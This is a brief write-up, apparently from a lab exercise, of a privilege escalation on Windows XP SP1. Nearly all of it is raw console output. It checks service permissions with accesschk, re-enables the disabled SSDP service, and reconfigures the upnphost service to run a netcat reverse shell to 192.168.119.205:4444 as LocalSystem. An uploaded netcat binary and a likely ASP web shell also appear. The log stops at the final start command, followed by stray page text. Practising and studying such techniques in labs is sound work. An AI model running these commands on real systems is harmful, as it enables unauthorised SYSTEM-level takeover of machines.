Writeup Esc WinXP SP1 with services
C:\Inetpub\wwwroot>accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
C:\Inetpub\wwwroot>accesschk.exe /accepteula -ucqv SSDPSRV
accesschk.exe /accepteula -ucqv SSDPSRV
SSDPSRV
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
RW NT AUTHORITY\LOCAL SERVICE
SERVICE_ALL_ACCESS
C:\Inetpub\wwwroot>accesschk.exe /accepteula -ucqv upnphost
accesschk.exe /accepteula -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
RW NT AUTHORITY\LOCAL SERVICE
SERVICE_ALL_ACCESS
C:\Inetpub\wwwroot>sc qc upnphost
sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Universal Plug and Play Device Host
DEPENDENCIES : SSDPSRV
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\Inetpub\wwwroot>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: SSDPSRV
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SSDP Discovery Service
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\Inetpub\wwwroot>sc query SSDPSRV
sc query SSDPSRV
SERVICE_NAME: SSDPSRV
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Inetpub\wwwroot>sc query upnphost
sc query upnphost
SERVICE_NAME: upnphost
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Inetpub\wwwroot>net start SSDPSRV
net start SSDPSRV
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
C:\Inetpub\wwwroot>sc config SSDPSRV start= auto
sc config SSDPSRV start= auto
[SC] ChangeServiceConfig SUCCESS
C:\Inetpub\wwwroot>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: SSDPSRV
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SSDP Discovery Service
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\Inetpub\wwwroot>net start SSDPSRV
net start SSDPSRV
The SSDP Discovery Service service is starting.
The SSDP Discovery Service service was started successfully.
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is 50C3-3741
Directory of C:\Inetpub\wwwroot
02/04/2022 08:37 PM <DIR> .
02/04/2022 08:37 PM <DIR> ..
02/04/2022 08:37 PM 222,592 accesschk.exe
02/04/2022 08:34 PM 1,221 gerh.asp
09/19/2008 06:06 PM 7 index.htm
02/04/2022 08:35 PM 59,392 nc.exe
02/04/2022 08:36 PM 0 radE4009.tmp
02/04/2022 08:36 PM 66,560 whoami.exe
6 File(s) 349,772 bytes
2 Dir(s) 1,630,248,960 bytes free
C:\Inetpub\wwwroot>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe"
[SC] ChangeServiceConfig SUCCESS
C:\Inetpub\wwwroot>sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS
C:\Inetpub\wwwroot>sc qc upnphost
sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Universal Plug and Play Device Host
DEPENDENCIES : SSDPSRV
SERVICE_START_NAME : LocalSystem
C:\Inetpub\wwwroot>net start upnphostÚltima actualización